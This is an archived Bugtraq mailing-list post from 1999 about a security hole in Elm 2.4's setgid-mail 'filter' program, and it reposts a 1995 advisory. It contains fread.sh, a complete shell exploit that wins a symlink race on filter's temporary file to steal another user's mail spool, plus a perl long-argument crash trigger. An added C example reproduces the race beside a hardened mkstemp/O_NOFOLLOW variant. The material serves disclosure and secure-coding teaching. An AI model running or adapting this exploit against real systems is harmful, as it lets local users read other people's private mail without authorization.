Bugtraq mailing list archives
elm filter program
From: krasel () WPXX02 TOXI UNI-WUERZBURG DE (Cornelius Krasel)
Date: Sun, 12 Sep 1999 19:08:59 +0200
Mark Ultor wrote:
> I've found a bug in filter on Elm 2.4 PL25. filter got SGID on mail group.
>
> sowatech:~$ filter -f `perl -e ' print "A" x 5000'`
> Segmentation fault
"filter" is inherently unsafe. A bug has been described in 1995 which allows reading email of anybody on the system. The description can be found in the BugTraq archives, I believe. I include the full message below. While it was written in 1995, it still works with the filter version of Elm 2.4ME+ PL35 (25) which is from 1997. (I don't know whether there are any more recent elm versions.)

--Cornelius.

------cut here-------

filter (elm package) security hole
David J Meltzer (davem+ () andrew cmu edu)
Tue, 26 Dec 1995 15:07:49 -0500

The elm filter under linux runs sugrp mail, thus allowing it to freely read and write from users mail spools. It is only through the integrity of its code that the security of linux's mail system is protected; and in this respect it falls short. The failure of the filter program to properly handle temporary files allows a user to read or write to any user's mail spool, a significant security hole.

The specific problem that is exploited in this hole is the way filter uses a temporary file to store the input to it, and then subsequently send it back out according to the filter. Because of the modularity of the coding, in the main filter.c, the temporary file is opened, and then written to; after which it is closed. The mailmessage function is then called, with the purpose of forwarding that mail, written to the temporary file, to whatever destination is specified in the filter. At the start of this process, the temporary file is opened, and the contents of it are dumped to the mail spool of the user the mail is being forwarded to.

At any point after the file has been initially opened by the main filter function, since the user running filter has permissions on that temp file, it can be rm'd. The temp file existing can then be replaced with a symbolic link to any file that group mail has read permissions on. When it is opened in the mailmessage function, the symbolic link is followed and whatever file that was pointed to will be read in, and the contents forwarded to the user specified in the mail spool.

The complete exploits are shown below:

Program: filter, an elm utility
Affected Operating Systems: linux - Slackware 3.0, others with sgid mail filter
Requirements: account on machine
Security Compromise: user can read any mail spool readable by grp mail. (usually everything, sometimes not root)
Author: Dave M. (davem () cmu edu)
Synopsis: filter writes out the mail to be forwarded to a temporary file, which is then closed and reopened; if when the temporary file is reopened it is a symlink to a mail spool, filter will proceed to forward the contents of that file as if it was the original message.

------cut here-------
#!/bin/sh
# This shell script exploits a problem with filter(1L)
# it will follow symbolic links, on a read allowing
# us to steal a users mail file.
#
# Usage: fread.sh victimsusername
#
# Contents will be stored in ~/victimsusername.mail
#
# Dave M. (davem () cmu edu)
#
cp /var/spool/mail/$LOGNAME ~
cp /dev/null /var/spool/mail/$LOGNAME
echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp
cat << _EOF_ >> /tmp/fread-msg.tmp
From: Dave
To: $LOGNAME
Subject: Filter Exploit
_EOF_
echo sleep 2 > /tmp/fread-sh.tmp
echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp
chmod +x /tmp/fread-sh.tmp
/tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp &
FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'`
rm -f /tmp/filter.$FREAD
ln -s /var/spool/mail/$1 /tmp/filter.$FREAD
sleep 2
rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp /tmp/fread-ftr.tmp /tmp/filter.$FREAD
FREAD=
cp /var/spool/mail/$LOGNAME ~/$1.mail
cp ~/$LOGNAME /var/spool/mail
more ~/$1.mail
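Editor's added example, not code from elm or from either message above: the write/close/reopen-by-name temp-file pattern Meltzer describes in filter(1), beside a variant that creates the file with mkstemp(), records its inode, and refuses a reopen that no longer names the same regular file. The function names, the scratch directory under /tmp and the "victim spool" contents are this example's own constructions; the race callback plays the part of fread.sh's rm/ln -s between the two opens.

```c
/* Added example (not elm's code): filter's temp-file race and a hardened
 * variant. Names, scratch paths and the victim file are constructed here. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable shape: message written to a predictable name, closed, then
 * reopened by name in a later step. Whatever sits at the path by then,
 * e.g. a symlink to someone else's spool, is what gets read. */
static ssize_t vuln_spool_and_reopen(const char *path, const char *msg,
                                     void (*race)(const char *),
                                     char *out, size_t outlen)
{
    FILE *fp = fopen(path, "w");      /* main filter(): write message  */
    if (!fp) return -1;
    fputs(msg, fp);
    fclose(fp);
    race(path);                       /* the window the exploit uses   */
    fp = fopen(path, "r");            /* mailmessage(): reopen by name */
    if (!fp) return -1;
    size_t n = fread(out, 1, outlen - 1, fp);
    fclose(fp);
    out[n] = '\0';
    return (ssize_t)n;
}

/* Hardened shape: mkstemp() creates an unpredictable name with O_EXCL and
 * hands back a descriptor; its dev/inode is recorded. A reopen by path
 * uses O_NOFOLLOW and is accepted only if it is still that same regular,
 * singly-linked inode. Keeping the descriptor removes the reopen entirely. */
static ssize_t safe_spool_and_reopen(char *tmpl, const char *msg,
                                     void (*race)(const char *),
                                     char *out, size_t outlen)
{
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    struct stat created, now;
    if (fstat(fd, &created) < 0 || write(fd, msg, strlen(msg)) < 0) {
        close(fd);
        return -1;
    }
    race(tmpl);
    int fd2 = open(tmpl, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd2 < 0) { close(fd); return -1; }   /* ELOOP: symlink planted */
    int same = fstat(fd2, &now) == 0 && S_ISREG(now.st_mode) &&
               now.st_dev == created.st_dev && now.st_ino == created.st_ino &&
               now.st_nlink == 1;
    ssize_t n = same ? pread(fd2, out, outlen - 1, 0) : -1;
    close(fd2);
    close(fd);
    if (n < 0) return -1;
    out[n] = '\0';
    return n;
}

static char g_victim[512];

/* What fread.sh does between the two opens: the attacker owns the temp
 * file, so it can be removed and replaced by a symlink to the victim. */
static void plant_symlink(const char *path)
{
    unlink(path);
    symlink(g_victim, path);
}

/* Constructed scenario in a scratch directory. Returns 1 when the
 * vulnerable variant read the victim's spool and the hardened one refused,
 * 0 otherwise, -1 on setup failure. */
int demo_symlink_race(void)
{
    char dir[] = "/tmp/filterdemo.XXXXXX";
    char path[600], tmpl[600], buf[256];
    if (!mkdtemp(dir)) return -1;
    snprintf(g_victim, sizeof g_victim, "%s/victim.spool", dir);
    FILE *v = fopen(g_victim, "w");
    if (!v) return -1;
    fputs("From victim  Secret mail\n", v);   /* constructed victim data */
    fclose(v);
    snprintf(path, sizeof path, "%s/filter.%d", dir, (int)getpid());
    snprintf(tmpl, sizeof tmpl, "%s/filter.XXXXXX", dir);
    ssize_t vn = vuln_spool_and_reopen(path, "attacker message\n",
                                       plant_symlink, buf, sizeof buf);
    int leaked = vn > 0 && strstr(buf, "Secret mail") != NULL;
    ssize_t sn = safe_spool_and_reopen(tmpl, "attacker message\n",
                                       plant_symlink, buf, sizeof buf);
    int refused = sn < 0;
    unlink(path); unlink(tmpl); unlink(g_victim); rmdir(dir);
    return leaked && refused;
}

int main(void)
{
    int r = demo_symlink_race();
    printf("vulnerable leaked, hardened refused: %s\n", r == 1 ? "yes" : "no");
    return r == 1 ? 0 : 1;
}
```

Build with `cc -Wall -o filterdemo filterdemo.c && ./filterdemo`. The point the hardened variant makes is that a name in a shared directory is not an identity: once the descriptor is closed, nothing ties the path back to the file filter wrote, which is exactly the gap fread.sh slips a symlink into. Note also that when the program is sgid only, the temp file is still created under the caller's uid, so the sticky bit on /tmp does nothing to stop the rm.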
Current thread:
- (no subject) Mark Ultor (Sep 09)
- Re: your mail KSR[T] Contact Account (Sep 11)
- elm filter program Cornelius Krasel (Sep 12)
- Hotmail security vulnerability - injecting JavaScript using <STYLE> tag Georgi Guninski (Sep 13)
- Re: Hotmail security vulnerability - injecting JavaScript using <STYLE> tag Olaf Titz (Sep 14)
- Re: Hotmail security vulnerability - injecting JavaScript using Alan Cox (Sep 15)
- Re: Hotmail security vulnerability - injecting JavaScript using<STYLE> tag Georgi Guninski (Sep 15)
- Re: Hotmail security vulnerability - injecting JavaScript using<STYLE> tag Eivind Eklund (Sep 15)
- [support_feedback () us-support external hp com: Security Bulletins Digest] Patrick Oonk (Sep 15)
- Hotmail security vulnerability - injecting JavaScript using <STYLE> tag Georgi Guninski (Sep 13)
- Re: elm filter program Bill Pemberton (Sep 13)
- [RHSA-1999:037-01] Buffer overflow in mars_nwe Bill Nottingham (Sep 13)